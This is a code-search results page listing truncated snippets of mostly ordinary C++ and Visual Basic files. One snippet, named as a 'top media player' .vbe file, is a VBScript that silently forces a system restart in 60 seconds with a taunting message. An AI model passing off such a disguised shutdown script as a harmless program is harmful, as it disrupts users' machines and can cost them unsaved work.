代码搜索:msgbox
找到约 3,543 项符合「msgbox」的源代码
代码结果 3,543
www.eeworm.com/read/168123/5448328
cpp gengine.cpp
#include "..\common.h"
#include "gl.h"
#include "gengine.h"
//#define _OFFDDRAW //关闭DirectDraw
Hero *warrior;
int InitGraphicEngine( DWORD w, DWORD h, DWORD colordepth )
{
CheckCPU();
#if
www.eeworm.com/read/159854/5580193
bas servervb.bas
Attribute VB_Name = "servervb"
Public Declare Function CreateMailslot Lib "kernel32" Alias "CreateMailslotA" (ByVal lpName As String, ByVal nMaxMessageSize As Long, ByVal lReadTimeout As Long, ByVal
www.eeworm.com/read/159854/5580197
bas clientvb.bas
Attribute VB_Name = "clientvb"
Option Explicit
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As
www.eeworm.com/read/159854/5580201
bas fileiovb.bas
Attribute VB_Name = "fileiovb"
'
' Project: fileio
'
' Description:
' This is another simple app that uses the Win32 APIs CreateFile and
' WriteFile to create a file on a remote computer.
www.eeworm.com/read/475607/6774269
vbe 顶级播放器.vbe
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说'我是猪',不说我是猪就1分钟后关你机,不信,试试···"" ",0 ,true
dim a
dim b
www.eeworm.com/read/294507/8222044
bas mdlprocresult.bas
Attribute VB_Name = "mdlProcResult"
Option Explicit
'============================================================================
'以下三个过程是对添加,删除和更新三种结果的处理。
'1 删除完成后只需要删除列表视图的对应项目后以消息框提示用户即可
'
www.eeworm.com/read/193040/8256937
frm scordform.frm
VERSION 5.00
Object = "{5E9E78A0-531B-11CF-91F6-C2863C385E30}#1.0#0"; "MSFLXGRD.OCX"
Begin VB.Form ScordForm
BorderStyle = 1 'Fixed Single
Caption = "运动项目积分设置窗口"
Client
www.eeworm.com/read/293595/8284167
frm frmbtypeman.frm
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX"
Begin VB.Form frmBTypeMan
BorderStyle = 1 'Fixed Single
Caption = "图书类型管理"
ClientHe